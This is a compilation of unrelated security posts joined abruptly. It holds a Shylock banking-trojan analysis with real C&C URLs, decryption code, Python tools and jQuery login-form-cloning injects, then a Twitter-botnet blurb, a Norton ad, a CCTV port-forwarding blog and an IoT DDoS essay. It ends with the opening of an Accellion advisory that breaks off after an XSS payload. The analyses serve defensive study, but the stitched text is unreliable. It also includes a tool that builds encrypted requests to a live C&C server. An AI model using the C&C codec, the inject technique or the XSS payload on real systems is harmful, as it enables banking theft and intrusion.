It can also delete and upload Flash Player cookies (Local Shared Object - SOL files) stored in the %APPDATA%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys directory. Flash cookies survive traditional cookie removal by the end user, as they are not controlled through the browser's cookie privacy controls.

Internally, Shylock runs in one of 3 modes:
  • master
  • slave
  • plugin

The 'master' is responsible for communication with the remote server: sending 'beacon' signals, posting detailed computer information, reports/files and error logs, and polling the remote C&C server for configuration files on injection/redirection and other execution parameters. The 'master' may spawn a thread that records a video of everything that occurs on the screen and then uploads it to the remote server. In order to 'talk' to the 'slaves' and 'plugins' injected into other running processes, the 'master' uses an Interprocess Communication (IPC) mechanism based on a named pipe, which allows sharing data across all Shylock components running in different processes.

The Shylock executable has a dedicated configuration stub in its image, similar to ZeuS. For example, the C&C URLs and the name of the injection configuration file are hard-coded in that stub as:
  • https://wguards.cc/ping.html
  • https://hiprotections.su/ping.html
  • https://iprotections.su/ping.html
  • /files/hidden7770777.jpg

The use of a stub suggests that the Shylock executable is most likely compiled once with an empty stub and then dynamically 'patched' by a builder to embed different C&C URLs, with the string encryption routine being part of the builder.

One of the configuration stub fields contains a timestamp of the date and time when the executable was generated. Shylock attempts to avoid execution if the current time is past the compilation time by more than 2 hours. But, either due to a bug or a 'feature', the 2-hour time span ignores months, so it will run on the same day of every month of the same year, but only within the 2-hour 'window'. If Shylock is executed outside that window, it quits. The 2-hour span means that Shylock allows only 'fresh' installations/executions of itself, when the C&C servers embedded in the executable are live; otherwise, it risks being exposed by constantly pinging non-existent (or taken down) domains, ringing all the bells within intrusion/anomaly detection systems.

All strings are encrypted with a random key that is stored together with the encrypted string: the key occupies 4 bytes, followed by 4 zero bytes, followed by the encrypted data. The code decrypts the strings on the fly: first, it performs an integrity check by applying the key to the encrypted data and making sure the original string has at least 2 characters in it; next, it decrypts the string itself.

The reconstructed string checker and decryptor would look like:

#include <windows.h>

// Returns the number of bytes the string decrypts to before the first byte
// that decrypts to 0 (or 0 if szString is NULL). Shylock uses this as the
// integrity check described above, before decrypting for real.
int iGetEncodedStringLen(DWORD dwKey, char *szString)
{
    int iResult;
    int iCount;

    if (szString)
    {
        iCount = 0;
        // does the first byte decrypt to something other than 0?
        if ((BYTE)dwKey ^ *(LPBYTE)szString)
        {
            do
            {
                ++iCount;
                // next key-stream value; the DWORD arithmetic wraps at 32 bits first
                dwKey = (845 * dwKey + 577) % 0xFFFFFFFF;
            }
            // stop when the low key byte equals the cipher byte, i.e. plaintext 0
            while ((BYTE)dwKey != *(LPBYTE)(iCount + szString));
        }
        iResult = iCount;
    }
    else
    {
        iResult = 0;
    }
    return iResult;
}

// Decrypts szEncrypted in place with the same key stream.
// iFlag == 1: stop once a byte decrypts to 0; iFlag == 0: stop once the
// encrypted byte itself is 0; any other value: no terminator check at all
// (as in the decompiled code, so the caller must know the length).
void DecodeString(void *szEncrypted, unsigned int dwKey, int iFlag)
{
    char b1;
    char b2;
    bool bEndOfString;

    if (szEncrypted)
    {
        while (1)
        {
            b1 = *(LPBYTE)szEncrypted;          // encrypted byte
            b2 = dwKey ^ *(LPBYTE)szEncrypted;  // decrypted byte (low key byte only)
            *(LPBYTE)szEncrypted = b2;
            if (iFlag == 1)
            {
                bEndOfString = b2 == 0;
            }
            else
            {
                if (iFlag)
                {
                    goto skip_check;
                }
                bEndOfString = b1 == 0;
            }
            if (bEndOfString)
            {
                return;
            }
skip_check:
            szEncrypted = (char *)szEncrypted + 1;
            dwKey = (845 * dwKey + 577) % 0xFFFFFFFF;
        }
    }
}

so that the encrypted C&C URL below:

char szTest[] = "\xE7\xEB\xBB\x91"                      // key
                "\x00\x00\x00\x00"                      // 4 zeroes
                "\x8F\xC8\xB9\x9A\xD0\x72\xC6\x79\x68\xF3"
                "\xB0\xE3\x29\xC4\x12\x40\x34\x0F\x92\x6A"
                "\x7A\x96\xBE\xA8\xE7\x30\xD8\xDE\xCB";

can now be decrypted as:

if (iGetEncodedStringLen(*(DWORD*)szTest, szTest + 8) > 0)
{
    DecodeString(szTest + 8, *(DWORD*)szTest, 1);
    MessageBoxA(NULL, szTest + 8, NULL, MB_OK);
}



A stand-alone tool that relies on such a decryptor can decrypt and patch all 751 strings within the Shylock executable, further facilitating its static analysis.
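As an added illustration of such a tool (this is not the post's own code), here is a Python scanner that walks a raw image looking for the 'key | 00 00 00 00 | ciphertext' layout described above, decrypts each candidate with the same LCG key stream as the reconstructed DecodeString(), and patches the plaintext back over the ciphertext. The sample image, the second record and its key 0x0BADF00D are constructed here; the first record is the szTest blob quoted in the post.

```python
# Scanner/decryptor for Shylock-style embedded strings.  Added example, not
# the post's own tool.  Record layout per the post: 4-byte little-endian key,
# 4 zero bytes, then ciphertext.  Key stream: XOR each byte with the low byte
# of key, then key = (845*key + 577) in wrapping 32-bit DWORD arithmetic,
# followed by % 0xFFFFFFFF, exactly as the reconstructed C code computes it.
import struct
from typing import List, Tuple

MASK32 = 0xFFFFFFFF


def next_key(key: int) -> int:
    """One LCG step as the 32-bit C code evaluates it (wrap first, then modulo)."""
    return ((845 * key + 577) & MASK32) % 0xFFFFFFFF


def decode_string(key: int, data: bytes) -> bytes:
    """Equivalent of DecodeString(..., iFlag=1): stop at the first byte that
    decrypts to NUL (or at the end of `data` if no NUL is reached)."""
    out = bytearray()
    for c in data:
        p = c ^ (key & 0xFF)
        if p == 0:
            break
        out.append(p)
        key = next_key(key)
    return bytes(out)


def encode_string(key: int, plain: bytes) -> bytes:
    """Inverse of decode_string (XOR is symmetric); appends the encrypted NUL.
    Used here only to build constructed test images."""
    out = bytearray()
    for p in plain + b"\x00":
        out.append(p ^ (key & 0xFF))
        key = next_key(key)
    return bytes(out)


def scan_image(buf: bytes, min_len: int = 4, max_len: int = 512) -> List[Tuple[int, bytes]]:
    """Find candidate records in a raw image.  A candidate is kept only if it
    decrypts to at least min_len printable ASCII bytes and a NUL terminator
    is reached within max_len bytes; this filters out chance runs of zeros."""
    zeros = b"\x00\x00\x00\x00"
    hits = []
    for off in range(0, len(buf) - 8):
        if buf[off + 4:off + 8] != zeros or buf[off:off + 4] == zeros:
            continue
        key = struct.unpack_from("<I", buf, off)[0]
        chunk = buf[off + 8:off + 8 + max_len]
        text = decode_string(key, chunk)
        terminated = len(text) < len(chunk)
        if terminated and len(text) >= min_len and all(0x20 <= b < 0x7F for b in text):
            hits.append((off, text))
    return hits


def patch_image(buf: bytes) -> bytes:
    """Overwrite each recovered ciphertext with its NUL-terminated plaintext,
    the way the post's stand-alone tool patches the executable for static analysis."""
    out = bytearray(buf)
    for off, text in scan_image(buf):
        out[off + 8:off + 8 + len(text) + 1] = text + b"\x00"
    return bytes(out)


# The encrypted C&C URL record quoted in the post (key 0x91BBEBE7 little-endian).
SZTEST = (b"\xE7\xEB\xBB\x91" + b"\x00\x00\x00\x00" +
          b"\x8F\xC8\xB9\x9A\xD0\x72\xC6\x79\x68\xF3"
          b"\xB0\xE3\x29\xC4\x12\x40\x34\x0F\x92\x6A"
          b"\x7A\x96\xBE\xA8\xE7\x30\xD8\xDE\xCB")


def build_sample_image() -> bytes:
    """Constructed image: filler bytes around two records - the post's blob and
    a second string encrypted here with a made-up key (0x0BADF00D)."""
    key2 = 0x0BADF00D
    rec2 = struct.pack("<I", key2) + b"\x00" * 4 + encode_string(key2, b"constructed-string")
    return b"\xCC" * 16 + SZTEST + b"\xCC" * 7 + rec2 + b"\xCC" * 16


if __name__ == "__main__":
    for off, text in scan_image(build_sample_image()):
        print("0x%04X: %s" % (off, text.decode()))
```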

When Shylock communicates with the remote C&C server, it relies on HTTPS. In addition, the transferred data is encrypted with the RC4 algorithm. Shylock takes one of the C&C server URLs stored in its configuration stub and prepends a random string to the host name, delimited with a dot. For example, wguards.cc becomes ei0nciwerq7q8.wguards.cc.

The modified domain name resolves successfully and is used for communications. The same domain name is then used to form an encryption key: Shylock appends the hard-coded string 'ca5f2abe' to the modified domain name, and then uses the result as the seed from which the 256-byte RC4 key state is generated. That RC4 key is used to encrypt the transferred data. Once encrypted, the data is base64-encoded, URL-escaped, and passed as a request to the C&C server within a z= URL parameter, e.g.:

http://ei0nciwerq7q8.wguards.cc/ping.html?z=[encrypted_data]

where [encrypted_data] is a result of:

url_escape(base64_encode(RC4_encrypt(url_escape(text_log), "ei0nciwerq7q8.wguards.ccca5f2abe")))

The C&C server thus reads the z= parameter contents, URL-unescapes it, base64-decodes it, RC4-decrypts it using the server's own name with the 'ca5f2abe' string appended as the password, and then URL-unescapes the resulting data, which is plain text.

By taking the source code of the functions rc4_init() and rc4_crypt(), published earlier in this post, and calling them with the modified domain name (plus suffix) as the RC4 'password', Shylock traffic can now be fully decrypted, as demonstrated below:



As seen in the picture, the posted 'cmpinfo' data is accompanied by a checksum and a hash that ensure data integrity ('key' and 'id'); it also shows the installation mode ('master'), the botnet name ('net2') and the command name ('log'). The data includes a system snapshot log that lists running processes, installed applications, programs registered to run at startup, HDD/CPU system info, and many other details about the compromised OS. Shylock also recognises and reports all major antivirus/firewall products by querying a long list of process names and registry entries.

The executable drops a copy of itself as a temp file, registers itself in a start-up registry key, then injects into svchost.exe and explorer.exe and runs a self-termination batch script, thus completing its 'installation' phase.

When Shylock requests configuration data from the server, it uses a 'cmd' (command) parameter set to 'cfg' (configuration).

Let's manually construct a request 'net=net2&cmd=cfg', then feed it to the debugged code to calculate the 'key' and 'id' parameters for us. The resulting request will be:

key=a323e7d52d&id=47E8ABF258AB82ECEF14F79B37177391&inst=master&net=net2&cmd=cfg

The C&C we'll use is https://y85rqmnuemzxu5z.iprotections.su/ping.html, so we encrypt the request with the RC4 key 'y85rqmnuemzxu5z.iprotections.suca5f2abe' and then base64-encode it. The server replies to such a request with base64-encoded text, transferred via HTTPS:



Once this response is base64-decoded, it needs to be decrypted. The key used to encrypt this data is not the same as before: it is the 'id' value that was passed in the request to the server, i.e. '47E8ABF258AB82ECEF14F79B37177391' in our example above. By using this value as the RC4 'password', the server response can be decrypted with the same tool as before. The decrypted file turns out to be an XML file with the configuration parameters in it:
<hijackcfg>
      <botnet name="net2"/>
      <timer_cfg success="1200" fail="1200"/>
      <timer_log success="600" fail="600"/>
      <timer_ping success="1200" fail="1200"/>
      <urls_server>
            <url_server url="https://protections.cc/ping.html"/>
            <url_server url="https://eprotections.su/ping.html"/>
            <url_server url="https://iprotections.su/ping.html"/>
      </urls_server>
      
... and so on
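Pulling the request and response envelopes together, here is an added Python example (not the post's rc4_init()/rc4_crypt() tool) that implements the z= parameter encoding and decoding for requests, keyed by the modified host name plus 'ca5f2abe', and the response decryption keyed by the request's 'id'. The host name and request string are the ones quoted above; the XML reply body is a constructed stand-in, not captured traffic.

```python
# Codec for the Shylock C&C 'z=' envelope described in the post.  Added
# example, not the post's own tool.
#   request : z = url_escape(base64(RC4(url_escape(text), host + "ca5f2abe")))
#   response: base64(RC4(xml, id_value)), id_value being the 'id' sent in the request
import base64
import urllib.parse

KEY_SUFFIX = "ca5f2abe"   # hard-coded suffix quoted in the post


def rc4_init(key: bytes) -> list:
    """RC4 key scheduling: expand the password into the 256-byte state
    (the '256-byte RC4 key' the post refers to)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """RC4 is symmetric: the same call encrypts and decrypts."""
    s = rc4_init(key)
    i = j = 0
    out = bytearray()
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def traffic_key(host: str) -> bytes:
    """'<random>.<cnc-domain>' + 'ca5f2abe' is the RC4 password for requests."""
    return (host + KEY_SUFFIX).encode()


def encode_request(text: str, host: str) -> str:
    """Build the z= value following the post's formula, innermost call first."""
    inner = urllib.parse.quote(text, safe="").encode()
    ct = rc4_crypt(traffic_key(host), inner)
    return urllib.parse.quote(base64.b64encode(ct).decode(), safe="")


def decode_request(z_value: str, host: str) -> str:
    """Server-side (or analyst-side) reverse of encode_request: unescape,
    base64-decode, RC4-decrypt with the host-derived key, unescape again."""
    ct = base64.b64decode(urllib.parse.unquote(z_value))
    return urllib.parse.unquote(rc4_crypt(traffic_key(host), ct).decode())


def decode_response(b64_body: str, id_value: str) -> str:
    """The config reply is base64(RC4(xml, id)), keyed by the request's 'id'."""
    return rc4_crypt(id_value.encode(), base64.b64decode(b64_body)).decode()


def encode_response(xml: str, id_value: str) -> str:
    """Inverse of decode_response; used here only to build a constructed reply."""
    return base64.b64encode(rc4_crypt(id_value.encode(), xml.encode())).decode()


def parse_request_fields(text: str) -> dict:
    """Split the decrypted 'key=...&id=...&inst=...' body into a dict."""
    return dict(urllib.parse.parse_qsl(text))


# Values quoted in the post (the request the debugged code produced).
HOST = "y85rqmnuemzxu5z.iprotections.su"
REQUEST = "key=a323e7d52d&id=47E8ABF258AB82ECEF14F79B37177391&inst=master&net=net2&cmd=cfg"
# Constructed stand-in for the server's XML reply (not captured traffic).
SAMPLE_XML = '<hijackcfg><botnet name="net2"/><timer_cfg success="1200" fail="1200"/></hijackcfg>'

if __name__ == "__main__":
    z = encode_request(REQUEST, HOST)
    print("GET https://%s/ping.html?z=%s" % (HOST, z))
    fields = parse_request_fields(decode_request(z, HOST))
    reply = encode_response(SAMPLE_XML, fields["id"])
    print(decode_response(reply, fields["id"]))
```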

The XML lists other plugin URLs, the backconnect server IP address and port number used by the reverse SOCKS proxy connection for live VNC sessions, and the URL of the latest Shylock executable for updates. All the most important plugins contained in the configuration file were already explained above. The C&C list is refreshed with the new servers. The last remaining bit here is the 'httpinject' parameter, specified as:
<httpinject value="on" url="/files/hidden7770777.jpg" md5="c2ffb650839873a332125e7823d36f9e"/>
It's the same name as the one specified in the executable stub along with the 3 C&C URLs; only now it's clear that this file contains the browser injection/redirection logic. So let's fetch it by downloading it directly from the C&C as a static file.

The downloaded file is compressed with zlib v1.2.3; once decompressed, it shows all web inject logic employed by Shylock.

Web Injects

The web injects of Shylock work by intercepting online banking sessions and injecting extra HTML data. Analysis of the configuration data suggests that Shylock attacks mostly UK banks.

There are several types of data that Shylock replaces on a web page. In one type, Shylock replaces the phone numbers provided on the bank's site. In the example below, the trojan modifies the bank's complaint form - the inset shows what the original form is replaced with:



In other cases, the web pages themselves are not modified - only the enlisted phone numbers are replaced.

Calling the replacement phone number leads to the following auto-reply message (actual audio recording):

Auto Reply Message

The injection of phone numbers into the web sites is most likely designed to prevent resolution scenarios in which customers receive a phishing email, or become concerned about stolen funds or compromised accounts. In case of a security breach, the natural thing for many to do is to open the bank's website and look up the telephone number to call the bank and cancel the credit card, or lock other accounts. By accessing the bank site through the same compromised system, the issues that need to be addressed as quickly as possible might not be addressed when time is critical.

Apart from the phone number replacements, online banking login forms are simply blocked from being displayed by setting their CSS style to:
style="display:none;"
In another scenario, the web inject contains a jQuery script that detects the login form on a page, then clones it with jQuery's .clone() method:
var ombtrwcf756gsw = frm.clone(false).insertAfter(frm).show().attr('id', 'log-on-form');
The screenshot below shows the result of such cloning:



The original login form is then hidden from the user:
jQuery(this).hide();
Once the user fills out the cloned form with the login details and presses its Login button, the entered details are copied into the original form, which is then submitted by clicking the original Login button, so that the user still logs on successfully:
jQuery('#usr_name').val(lvltxt.qqqrcs06tl9npo);
jQuery('#usr_password').val(lvltxt.pwd);
jQuery('.login-button:first').find('div').click();
At the same time, the fields of the cloned form will be posted to the attacker's server (cross-domain) in the background (with XDomainRequest()).

The injects that collect personal information use tricky social engineering tactics, referring to existing malware as leverage to build trust in the compromised session:

Attention! Due recent new strains of malicious software such as Zeus and Spy Eye that have been targeting users of US Internet Banking website, we are forced to perform additional security checks on your computer.
We are now checking your system to make sure that your connection is secure. It allows us to ensure that your system is not infected.
Checking your settings frequently, allows you to keep your data intact. Keeping your Anti-Virus programs up to date is strongly recommended.
This process undergoes an additional layer of protection, identifying you as the authorised account user. Interrupting the test may lead to a delay in accessing your account online.
Checking browser settings...0%
Checking log files...
Checking encryption settings...


Another example:

A critical error has occurred. We could not recognize Your internet browser's security settings. This could be because You are using different web browser or different PC.
In order to confirm Your identify, we will send you a text message with one time password.
Below is the contact information we have on record for you that is eligible for the security check. If you have recently changed your contact information it may not be displayed.
Note: For security reasons, we have hidden parts of your contact information below with "xxx"


The injected scripts rely on jQuery, a powerful and modern script library that allows Shylock to manipulate online banking sessions the way it needs to. The harvested credit card numbers are even queried against the remote attacker's site to undergo validation. The scripts it injects rely on other scripts, dynamically downloaded from the malicious websites. That allows the attacker to manipulate Shylock's logic by updating those scripts, without even touching the command-and-control servers.

Conclusion

What makes Shylock dangerous is that it's a classic 'Blended Threat' by definition: a combination of best-of-breed malware techniques that evolved over time:

  • Disk spreader, Skype spreader
  • Kernel-mode rootkit, Bootkit
  • VNC with Back-connect Proxy server
  • FTP credentials stealer
  • Banking Trojan

Its technology is out there, 'in the wild'; all it takes now is a change to the inject scripts to start targeting any other bank in the world. As already happened before with ZeuS, it is now only a matter of time before it starts targeting other banks' customers.


          Insidious Twitter Botnet is Streaming in Stealth Mode        

Recently, I became aware of a prodigious stealth-mode Twitter botnet that contains upwards of 3 million user accounts, alongside two other botnets that total 100,000 bots. Kudos goes to the SadBotTrue security researchers, who first disclosed the botnet findings on their blog earlier this week. Stealth Twitter botnet. According to SadBotTrue, this particular botnet is the most […]

The post Insidious Twitter Botnet is Streaming in Stealth Mode appeared first on TekSec.


          Norton Antivirus 360 4.1.0.32 Download - Install        
Norton 360 all-in-one protection keeps your family, your PC and your information safe. This comprehensive solution combines antivirus, new automatic backup and antiphishing features with the industry's leading security and PC tuning technologies to provide a full circle of protection. Norton 360™ Version 3.0 delivers proven performance, offering today's fastest and lightest all-in-one solution to protect your PC and all of your online activities. It protects against viruses, worms, hackers and botnets, ...
          CCTV exposed. Why understanding network security is so important.        

For those of you who are regulars on Geekzone, you'll know one of my pet peeves is people who don't understand the huge security risk associated with port forwards. Port forwards are configured in routers and firewalls every day, and the vast majority of the people doing it probably never consider the security risks of something that's so easily done.

Opening up your network to allow traffic from anywhere on the Internet to directly access your PC or hardware behind your router and/or firewall removes an entire layer of security, and allows anybody on the Internet to directly access your PC or hardware on the port(s) that have been forwarded. If there are security exploits in either the software on your PC or the hardware it could easily compromise your entire network and your security.

If you're running a VoIP setup and port forward port 5060, you're opening your IP PBX or phone system up to a never-ending stream of bots and scripts trying to find holes in your system for the purpose of routing illegitimate calls. By setting up a port forward to CCTV equipment you run the risk of your security cameras being left wide open for anybody on the Internet to view, for entertainment or for malicious purposes.

In recent days we've once again seen a mainstream media article on Stuff discussing compromised or poorly configured CCTV cameras in New Zealand that can be openly viewed by anybody on the Internet. While Stuff has chosen not to name where these cameras are linked from, the source is insecam.org, a site that proclaims itself as "the world biggest directory of online surveillance security cameras". This story is very similar to another run in 2014 in the NZ Herald discussing the very same issue with cameras in New Zealand viewable on the insecam website.


While this site only lists openly viewable CCTV equipment, the IoT search tool Shodan is the best resource on the Internet for discovering hardware devices (CCTV and otherwise) that are exposed to the Internet. Many of these devices are "compromised" because of one simple flaw: either port forwards were configured to allow remote access, or UPnP was enabled, allowing the devices to create their own port forwards for remote access. It's worth pointing out here that the insecam website isn't doing anything illegal; it is simply aggregating content that's all publicly accessible.

If you’ve got CCTV cameras then it’s not an unrealistic requirement to want to view these remotely. Most systems these days offer web access and/or mobile apps allowing you to view your cameras from anywhere in the world, and many even pitch remote access as a key selling point. The simplest way to configure remote access is to set up a port forward allowing direct access to the camera itself, a Network Video Recorder (NVR) or a Digital Video recorder (DVR).

Some equipment may also be UPnP enabled to make this process even easier: if you have a router with UPnP capabilities and UPnP is enabled on both your router and the CCTV equipment, your CCTV equipment may be exposed to the Internet without your knowledge. By having a port forward or UPnP enabled you've exposed your CCTV system to the entire Internet, and it's now only as secure as the hardware you're using. And that's where the problems start.

Many people clearly never change default passwords of some of the equipment viewable on the Internet. Many brands of cheap Chinese CCTV equipment also run embedded software of dubious quality with very well known exploits and hacks. Many also contain backdoor passwords, meaning that even if you change the password these devices can still be accessed by anybody with this knowledge. As many of these systems are never upgraded by installers or end users, flaws that have been fixed can often still exist for the life of the system.

The issues also extend beyond somebody snooping on your video feeds: some of these exploits can also be used to turn your hardware into a bot capable of taking part in major DDoS attacks, or even into a tool for mining bitcoins. In September 2016 one of the world's largest DDoS attacks, against krebsonsecurity, was reportedly performed with the assistance of over 145,000 compromised CCTV cameras.

In my day job as a network engineer I’ve had numerous dealings with security companies who lack even basic fundamental knowledge when it comes to networking and security. Concepts of networking are something that many people will fail to grasp, with many people relying on the advice of others or a “she’ll be right” mentality rather than seeking proper advice from an expert.

There have been many threads here on Geekzone about CCTV systems, with comments posted by people who have been told that "nobody knows your IP address", "you're on a dynamic IP address which keeps changing so nobody will find you", "I'll change the port to something random so they won't find you" or "if you make your password secure you'll be fine". Statements like this show a fundamental lack of knowledge, and when they're given by people posing as security experts, they should really be raising alarm bells. Having a public IP that changes regularly or changing ports offers absolutely nothing in the way of security: scanners such as Shodan sweep the whole address space and every port regardless. Likewise, a secure password is meaningless if a backdoor master password exists on your device.

If you’re wanting remote access to most hardware on an internal network there is only one safe way to do this – by using a Virtual Private Network (VPN). By using an appropriate router with a built in VPN server you can connect your remote PC or phone via VPN and then safely browse your cameras with no risk of your cameras or data being exposed to the entire Internet. If access is only required from specific connections then you could also look to restrict access to a locked down range of public IP addresses to ensure your cameras are not unnecessarily exposed.

If you have an IP camera, NVR or DVR that’s exposed to the Internet using port forwards or you have UPnP enabled you should be taking immediate steps to secure it. If your knowledge of networking doesn’t extend to configuring a VPN then you should be disabling remote access and/or UPnP until such time as you are able to implement a VPN or lock down access to specific IP ranges.

If your security or CCTV installer has no issues with allowing port forwards then you should be on the lookout for a new installer. You’re not just compromising your own safety and security, you’re also compromising the safety, security and end user experience of everybody on the Internet if your hardware can be compromised and used as a bot for DDoS attacks.


          Canaltech Podcast - 10/07/2014        

Patent trolls, Slingshot fails to take off, Google announces a 'workaround' to get apps running on Wear, LG's 'rollable' TV, Brazil hit by botnets, iPhone with a haptic system
          Cyber Attack Code kills infected PCs        
The botnet-driven cyber attack on government, financial, and media sites in the U.S. and South Korea includes a newly discovered danger: the malicious code responsible for driving the distributed denial of service attack, known as W32.Dozer, is designed to delete data on infected computers and to prevent the computers from being rebooted, a shocking revelation made today by Network Computing.

The malicious code includes instructions to start deleting files when the infected computer's internal clock reached July 10, 2009. "Your machine is completely hosed at this stage," said Vincent Weafer, VP at Symantec Security Response.

According to Weafer, the malicious code will attempt to locate files with any of more than 30 different extensions, such as .doc, .pdf, and .xls, copy the data to an encrypted file that's inaccessible to the user, and then overwrite the data in the original files. It targets files associated with office, business, and development applications. The malicious code is also programmed to modify infected computers' Master Boot Records. The change renders computers inoperable following any attempt to reboot.

The impact of this self-destruct sequence should be minimal, however. Weafer said that he expects only a few thousand machines will be damaged. "I don't expect this to be a major issue, except perhaps in South Korea," he said.

The South Korean Intelligence Service estimated that about 20,000 compromised computers —mostly in South Korea—had been ordered to conduct a Distributed Denial of Service (DDoS) attack on U.S. and South Korean sites. Given the timing, which coincided with a North Korean missile test, suspicions have been raised about the involvement of hackers in North Korea or possibly China.

          Suspected Russian botnet mastermind is arrested        
Global cybercrime network attacked tens of thousands of computers
          IoT device vendors, don't become accomplices: IoT security seen through the Dyn DDoS attack        

When everything is connected, everything can be hacked

On 21 October 2016 the well-known network service Dyn was hit by three waves of massive botnet-driven DDoS attacks. Major websites around the world were interrupted, including large sites such as Amazon, Twitter, GitHub and PayPal. Security researchers found that the originator of this DDoS attack is unknown, but most of the attack traffic came from the "Mirai" botnet, which uses IP cameras, CCTV, DVRs and other IoT devices to carry out DDoS attacks. Why did these devices become accomplices in the attack, and how can we protect ourselves?

Behind every attack there is a reason. An attacker only attacks because they want something, whether fame, profit or fun. Because a DDoS attack directly affects the operation of the target system and the business behind it, in the underground economy such attacks are usually used for extortion. For example, a company running an online game is hit with DDoS, the game service is interrupted, and the company is forced to pay to "ransom" its hosts' connectivity back. But in the Dyn incident nobody received a ransom letter of that kind, so security experts speculate that it may have been a rehearsal, or even a marketing stunt for a DDoS-for-hire service. Looking at an attack from the perspective of the underground economy gives a completely different view. Suppose this was a hacker group's commercial marketing move, meant to show off the team's DDoS firepower: could the outcome be called a success story? If you were a buyer of such a service, would you have confidence in it?

Using IoT devices and network equipment to build botnets is not news. Internet Census 2012 was a major event in the security community: a botnet called Carna used 420,000 devices worldwide to scan the entire IPv4 address space, collecting IP usage, open ports, service banners and similar information, and released a total of 9 TB of data for open download and research. That botnet mostly exploited router vulnerabilities, logging into devices with default or empty passwords and planting backdoors for the attacker to control. Several large-scale attacks since then have also involved IoT and embedded devices, turning the IoT slogan "everything connected" into "everything hackable", and making such devices a favourite research target for security researchers. In recent years smart vehicles have developed rapidly, and there have been many incidents internationally of smart vehicles being hacked. A hacked vehicle affects not just information systems but personal safety and even a whole city's traffic, so the security stakes are far higher than before.

Why connected devices are the attackers' main targets

What kind of security holes let attackers exploit these devices so easily? At present, attackers and botnets mostly still exploit devices that use default passwords, or even have no password set at all. The Insecam website exposes tens of thousands of cameras worldwide whose passwords were never changed, showing again and again that many people and businesses buy surveillance cameras without sound security awareness and leave them exposed to the whole world. For more on the security of IP cameras, DVRs and NVRs, see our article "Security issues of IP cameras, DVRs and NVRs: do you know I'm watching you?". Besides default passwords, backdoors in devices are another big problem. Many router and wireless access point vendors have been exposed as shipping test login accounts in their systems; these accounts cannot be disabled or removed and are easily found by attackers through research. There is no remedy other than waiting for the vendor to release a firmware fix, so this has become one of the ways attackers take control of devices in bulk.

Why do IoT devices become the attackers' targets? We can discuss this in several points.

First, embedded devices were traditionally designed not to be networked. When the IoT wave rose, vendors rushed products to market to seize the first-mover advantage, adding network features and even app control to their existing products. The price of that haste is that security considerations are sacrificed; the vendors may not originally have had networking expertise, nor enough security staff to review security, so the resulting products have endless security holes. Product design must strictly follow the principle of Security by Design, incorporating security considerations in every step from the start of development and following Secure Coding guidelines, to avoid piling fix on top of fix late in the product's life, which makes tracing the root cause of a security problem nearly impossible.

Second, the product update mechanism. Early IoT devices' update mechanisms were not carefully considered: users had to download firmware updates themselves, and some devices even had to be returned to the factory for updating. Many users do not actively update firmware as long as the product works, and some even feel that updates only cause more problems. Without a convenient update mechanism, device security problems are even harder to handle properly. Recently, because security incidents have become frequent, FOTA (Firmware Over-The-Air) mechanisms have gradually received attention, but other security problems follow at once: how do we ensure firmware integrity? How do we stop attackers downloading the firmware to study and modify it? These are questions vendors need to keep thinking through.

Third, the enemy is in the dark while we are in the light, which we consider the most important point. We see security as a war of information asymmetry between attacker and defender: the defender (the vendor) usually defends based only on its own knowledge and imagination, without knowing the attacker's mindset and methods. This is like Gongshu Ban in the Spring and Autumn period, who built cloud ladders to help the state of Chu attack the cities of Song. Only by understanding the attacker and resolving this information asymmetry can one defend effectively, just as Mozi understood how the cloud ladder attacked, simulated every corresponding defence, and succeeded in making the King of Chu abandon the attack. Not only IoT vendors but all enterprises must understand the attacker's mindset and techniques, understand how the underground economy operates, and even run simulated drills against the attack methods, closing every gap in the defence, before they can face attackers head-on.

Vendors should avoid becoming accomplices, and consumers should protect themselves

As users, how do we check whether our own devices are infected, and how do we clean them effectively if they are? We suggest first searching for the brands and models with publicly known vulnerabilities. If your device is on the list, back up the device's settings, then restore the factory defaults to make sure any malware the attacker planted is removed. Next, update to the new firmware released by the vendor, and remember to change the password immediately after the update is installed to prevent a second intrusion. If the vendor has released no update, it may be that security is not taken seriously, or that the vendor has gone out of business. If you still choose to use the device, we suggest moving it to an internal network, or placing a defensive device in front of it, to keep attackers out.

How should vendors catch up on security? We think the most important thing for vendors today is security awareness. This is an old refrain: the internet industry has gradually come to value security, but the other IT industries now moving onto the network may not yet realise how serious it is. Now that traditional appliances are becoming smart appliances, vehicles smart vehicles, and even infrastructure is being computerised, if these industries entering the network have no corresponding security awareness it will be hard to prevent risks early on. Enterprises must also inventory where their risks lie and, through manual penetration testing, simulate the attacker's mindset and paths, blocking the intrusion routes one by one as in a military exercise. We believe that IoT and other embedded devices, smart appliances, and even network security equipment itself will all be targets of hacker groups in future; exploiting the difficulty of updating and administrators' neglect, they will build one large zombie army after another to serve as pieces in future wars. We hope that in future vendors will make security a priority when building products, will not become accomplices of the underground economy, and will let the world recognise Taiwanese products as high-quality products that put security first.


          Advisory: Accellion File Transfer Appliance Vulnerability        

By Orange Tsai



About Accellion FTA


Accellion File Transfer Appliance (FTA) is a secure file transfer service which enables users to share and sync files online with AES 128/256 encryption. The Enterprise version further incorporates SSL VPN services with integration of Single Sign-on mechanisms like AD, LDAP and Kerberos.

Vulnerability Details


In this research, the following vulnerabilities were discovered in FTA version FTA_9_12_0 (13-Oct-2015 release):

  • Cross-Site Scripting x 3
  • Pre-Auth SQL Injection leads to Remote Code Execution
  • Known-Secret-Key leads to Remote Code Execution
  • Local Privilege Escalation x 2

The above-mentioned vulnerabilities allow unauthenticated attackers to remotely attack FTA servers and gain the highest privileges. Once attackers fully control the servers, they can retrieve the encrypted files, user data, and so on.

After reporting to CERT/CC, these vulnerabilities were assigned 4 CVEs (CVE-2016-2350, CVE-2016-2351, CVE-2016-2352, CVE-2016-2353).

Areas Affected


According to public reconnaissance data, there are currently 1,217 FTA servers online around the world, most of which are located in the US, followed by Canada, Australia, the UK, and Singapore. Judging from the domain names and SSL certificates of these servers, FTA is widely used by governmental bodies, educational institutions and enterprises, including several well-known brands.

Vulnerability Analysis and Exploitation


Multiple Cross-Site Scripting (CVE-2016-2350)

1. XSS in move_partition_frame.html

https://<fta>/courier/move_partition_frame.html
?f2='-prompt(document.domain);//

2. XSS in getimageajax.php

